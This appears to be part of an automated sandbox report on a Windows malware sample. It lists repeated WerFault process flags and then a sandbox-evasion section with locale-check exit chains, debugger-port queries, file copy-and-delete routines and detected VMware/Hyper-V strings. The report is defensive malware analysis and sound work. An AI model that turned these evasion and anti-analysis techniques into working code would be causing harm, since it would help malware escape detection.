                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking locale)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26347
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeEvaded block: after key decisiongraph_0-27508
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI coverage: 6.5 %
                    Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022EE697
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022F3B17
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022F4B77
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022EEF87
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022F47D7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EE077
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022EDCE7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EF8F1 FindFirstFileA,0_2_022EF8F1
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022EC0D7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E1937
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022F4107
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EF917
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareB
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.0000000000883000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI call chain: ExitProcess graph end nodegraph_0-26332
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI call chain: ExitProcess graph end nodegraph_0-26375
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI call chain: ExitProcess graph end nodegraph_0-26335
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI call chain: ExitProcess graph end nodegraph_0-26351
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI call chain: ExitProcess graph end nodegraph_0-26346
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI call chain: ExitProcess graph end nodegraph_0-27760
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI call chain: ExitProcess graph end nodegraph_0-26220
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeAPI call chain: ExitProcess graph end nodegraph_0-26174
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_004045C0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,0_2_004045C0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
